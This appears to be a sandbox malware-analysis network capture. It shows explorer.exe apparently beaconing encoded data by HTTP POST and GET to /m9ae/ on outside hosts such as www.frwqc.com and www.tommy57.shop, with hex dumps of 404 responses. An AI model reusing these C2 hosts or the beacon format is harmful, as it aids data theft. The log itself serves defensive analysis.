                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - </h2> <h3>
                                                                                                                        Nov 29, 2022 10:35:12.320492029 CET275INData Raw: c3 a1 a3 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: </h3> </fieldset></div></div></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        14192.168.2.54972838.40.166.19580C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:35:14.336776018 CET276OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.frwqc.com
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 186
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.frwqc.com
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.frwqc.com/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 6b 77 50 68 58 4b 77 59 66 55 41 39 6a 68 52 32 30 72 28 4d 54 51 62 4c 78 33 6d 37 31 79 6f 62 7e 67 4f 37 6e 79 59 36 49 6f 4e 4a 7e 35 67 34 32 6f 57 69 43 68 49 5a 36 39 74 76 6d 43 57 30 33 6f 66 34 52 6a 31 73 58 43 6c 67 71 51 67 4b 34 4d 64 5a 50 56 6e 45 32 63 47 58 57 6b 6f 4b 34 43 32 6a 57 36 6b 37 47 72 51 37 35 41 48 38 43 73 47 36 63 62 53 4f 59 6b 43 39 51 71 63 54 6c 66 6e 58 64 71 66 67 43 44 53 5f 48 49 75 68 39 48 54 67 55 4b 30 37 47 32 7a 31 73 6b 79 4d 44 31 74 4c 32 53 76 50 49 74 72 35 68 30 34 6c 72 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=kwPhXKwYfUA9jhR20r(MTQbLx3m71yob~gO7nyY6IoNJ~5g42oWiChIZ69tvmCW03of4Rj1sXClgqQgK4MdZPVnE2cGXWkoK4C2jW6k7GrQ75AH8CsG6cbSOYkC9QqcTlfnXdqfgCDS_HIuh9HTgUK07G2z1skyMD1tL2SvPItr5h04lrw).
                                                                                                                        Nov 29, 2022 10:35:14.498594046 CET277INHTTP/1.1 404 Not Found
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        Date: Tue, 29 Nov 2022 09:35:11 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 1163
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e c4 fa d2 aa b2 e9 d5 d2 b5 c4 d7 ca d4 b4 bf c9 c4 dc d2 d1 b1 bb c9 be b3 fd a3 ac d2 d1 b8 fc b8 c4 c3 fb b3 c6 bb f2 d5 df d4 dd ca b1 b2 bb bf c9 d3
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - </h2> <h3>
                                                                                                                        Nov 29, 2022 10:35:14.498656034 CET277INData Raw: c3 a1 a3 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: </h3> </fieldset></div></div></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        15192.168.2.54972938.40.166.19580C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:35:16.524717093 CET278OUTGET /m9ae/?F6z4=pynBU+gmcVJLvmAk24XYTH3CuEH61wNq2RizpB0aNcQM45kGiq+MbQwB99t5gTqC+tvIVg5qQAlCnSYFpOBmFRnmyN3XSGsj5w==&mN6Hg=kRq8Chx0sXs4Nnu0 HTTP/1.1
                                                                                                                        Host: www.frwqc.com
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 29, 2022 10:35:16.686656952 CET279INHTTP/1.1 404 Not Found
                                                                                                                        Content-Type: text/html
                                                                                                                        Server: Microsoft-IIS/8.5
                                                                                                                        X-Powered-By: ASP.NET
                                                                                                                        Date: Tue, 29 Nov 2022 09:35:13 GMT
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 1163
                                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e c4 fa d2 aa b2 e9 d5 d2 b5 c4 d7 ca d4 b4 bf c9 c4 dc d2 d1 b1 bb c9 be b3 fd a3 ac d2 d1 b8 fc b8 c4 c3 fb b3 c6 bb f2 d5 df d4 dd ca b1 b2 bb bf c9 d3
                                                                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - </h2> <h3>
                                                                                                                        Nov 29, 2022 10:35:16.686723948 CET279INData Raw: c3 a1 a3 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                        Data Ascii: </h3> </fieldset></div></div></body></html>


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        16192.168.2.54973074.208.236.6580C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:35:21.868138075 CET280OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.tommy57.shop
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 410
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.tommy57.shop
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.tommy57.shop/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 66 49 32 47 58 62 68 30 54 72 53 4a 39 43 78 34 41 67 30 50 64 48 6a 6c 35 5f 64 6e 55 34 4f 46 6a 54 44 33 4a 73 64 49 4b 34 72 76 28 59 37 7a 4c 59 66 30 47 71 76 68 37 6b 77 57 57 56 7e 64 78 61 4b 6a 47 51 70 6c 5a 79 61 35 58 74 36 32 43 63 58 45 6f 6d 54 6d 38 79 59 41 68 45 58 4d 54 4a 79 7a 66 68 4a 52 30 31 67 32 68 46 28 75 4a 41 44 7a 52 34 41 35 70 5a 7e 62 73 56 6b 6e 50 63 41 46 6f 75 64 33 45 34 76 77 6e 72 52 4f 36 76 71 6a 59 64 76 31 75 4d 55 39 64 30 68 6b 53 4f 38 37 76 55 6f 73 6a 52 65 45 33 43 30 50 4c 65 6f 4d 73 6c 76 68 56 64 59 67 62 57 7e 52 4d 4c 48 52 7a 5f 41 73 79 36 31 6c 54 53 79 45 7e 4d 39 50 68 74 39 36 32 6f 75 42 4f 66 66 30 71 42 4c 47 55 78 42 43 6d 32 56 43 47 2d 76 42 59 6b 66 6e 4b 57 43 4d 38 66 53 70 50 51 58 7a 49 66 77 5f 6f 59 58 38 65 52 67 55 4b 42 45 4e 36 4a 47 30 73 5f 6f 30 76 4c 67 57 67 74 67 72 56 65 47 55 6b 55 71 6e 71 63 66 77 4c 73 76 62 79 38 43 38 4e 31 67 61 6f 6f 34 6a 64 64 36 68 70 35 7a 61 79 62 6d 53 56 46 41 49 6d 58 71 34 58 67 78 74 30 5a 71 7a 37 5a 36 37 34 65 7e 59 53 62 67 65 4c 45 43 44 77 65 61 4d 72 2d 6e 4e 4b 62 4c 36 51 34 71 4c 46 6f 55 78 66 44 4c 50 69 67 73 47 41 41 68 6c 65 79 4b 73 68 42 46 71 6e 77 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=fI2GXbh0TrSJ9Cx4Ag0PdHjl5_dnU4OFjTD3JsdIK4rv(Y7zLYf0Gqvh7kwWWV~dxaKjGQplZya5Xt62CcXEomTm8yYAhEXMTJyzfhJR01g2hF(uJADzR4A5pZ~bsVknPcAFoud3E4vwnrRO6vqjYdv1uMU9d0hkSO87vUosjReE3C0PLeoMslvhVdYgbW~RMLHRz_Asy61lTSyE~M9Pht962ouBOff0qBLGUxBCm2VCG-vBYkfnKWCM8fSpPQXzIfw_oYX8eRgUKBEN6JG0s_o0vLgWgtgrVeGUkUqnqcfwLsvby8C8N1gaoo4jdd6hp5zaybmSVFAImXq4Xgxt0Zqz7Z674e~YSbgeLECDweaMr-nNKbL6Q4qLFoUxfDLPigsGAAhleyKshBFqnw).
                                                                                                                        Nov 29, 2022 10:35:21.999813080 CET281INHTTP/1.1 404 Not Found
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Date: Tue, 29 Nov 2022 09:35:21 GMT
                                                                                                                        Server: Apache
                                                                                                                        Content-Encoding: gzip
                                                                                                                        Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        17192.168.2.54973174.208.236.6580C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 29, 2022 10:35:24.021054983 CET282OUTPOST /m9ae/ HTTP/1.1
                                                                                                                        Host: www.tommy57.shop
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 186
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.tommy57.shop
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.tommy57.shop/m9ae/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 46 36 7a 34 3d 66 49 32 47 58 62 68 30 54 72 53 4a 38 31 6c 34 4f 33 41 50 57 6e 6a 6c 32 66 64 6c 55 34 4f 4f 6a 54 44 7a 4a 70 39 59 4b 4c 4c 76 78 73 28 7a 4d 71 48 30 42 71 76 6d 75 55 77 53 56 6c 7e 49 78 61 4b 4f 47 52 46 6c 5a 79 4f 35 58 73 4b 32 43 50 50 46 70 6d 54 6f 36 79 59 42 72 6b 58 5a 54 4a 7e 6e 66 67 31 52 30 33 59 32 68 32 48 75 4a 53 62 30 56 59 41 36 6d 35 7e 57 6d 31 6b 52 50 63 42 6b 6f 75 63 71 45 36 6e 77 6d 66 4e 4f 39 39 79 69 42 4e 76 77 68 63 56 54 56 51 34 4d 55 5f 55 4b 6d 6c 31 53 39 43 36 52 7e 7a 74 32 58 51 29 2e 00 00 00 00 00 00 00 00
                                                                                                                        Data Ascii: F6z4=fI2GXbh0TrSJ81l4O3APWnjl2fdlU4OOjTDzJp9YKLLvxs(zMqH0BqvmuUwSVl~IxaKOGRFlZyO5XsK2CPPFpmTo6yYBrkXZTJ~nfg1R03Y2h2HuJSb0VYA6m5~Wm1kRPcBkoucqE6nwmfNO99yiBNvwhcVTVQ4MU_UKml1S9C6R~zt2XQ).
                                                                                                                        Nov 29, 2022 10:35:24.155739069 CET283INHTTP/1.1 404 Not Found
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Date: Tue, 29 Nov 2022 09:35:24 GMT
                                                                                                                        Server: Apache
                                                                                                                        Content-Encoding: gzip
                                                                                                                        Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 77 12 d2 33 4e 01 95 1a 14 16 6d 15 e2 0a b1 79 af 9b 1a 9d 32 6e 0f 84 e3 ef ed cd 16 7a 6c 81 42 38 0a 8c 8b c6 c0 eb 60 9a 8a 61 ce b0 ef 31 e1 f3 c9 0b 6c 60 6d 75 72 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        18192.168.2.54973274.208.236.6580C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
